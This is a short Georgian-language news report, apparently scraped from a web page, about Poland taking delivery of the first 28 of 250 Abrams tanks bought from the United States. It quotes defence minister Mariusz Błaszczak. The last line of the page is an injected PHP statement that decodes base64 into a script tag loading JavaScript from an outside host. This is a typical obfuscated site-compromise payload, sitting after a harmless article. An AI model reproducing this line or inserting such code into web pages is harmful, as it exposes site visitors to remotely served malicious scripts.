celsiusi
ავერსი შნაიდერი
250 ერთეული „აბრამსის“ ტიპის ტანკის შესყიდვის ხელშეკრულების ფარგლებში, პოლონეთმა შეერთებული შტატებიდან 28 ერთეული საბრძოლო ტანკი მიიღო.
 
უკრაინული მედიის ცნობით, ამის შესახებ პოლონეთის ეროვნული თავდაცვის მინისტრმა მარიუშ ბლაშჩაკმა განაცხადა.
 
„პირველი 28 ერთეული „აბრამსის“ ტანკი ჩამოვიდა პოლონეთში, პოლონელი ტანკისტების მოსამზადებლად“, – აღნიშნა ბლაშჩაკმა.
 
მისი თქმით, ეს არის აპრილში გაფორმებული ხელშეკრულების პირველი ეტაპი.
 
პოლონეთის თავდაცვის მინისტრის განცხადებით, რუსეთი უკრაინის წინააღმდეგ აგრესიის დროს აქტიურად იყენებს ჯავშანტექნიკასა და არტილერიას.
 
„აქედან გამომდინარე, ჩვენთვის თავის დაზღვევა მსოფლიოში საუკეთესო და თანამედროვე ტანკების სახით, იქნება რუსი აგრესორის დაშინების გარანტია“, – აღნიშნა ბლაშჩაკმა.
386
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");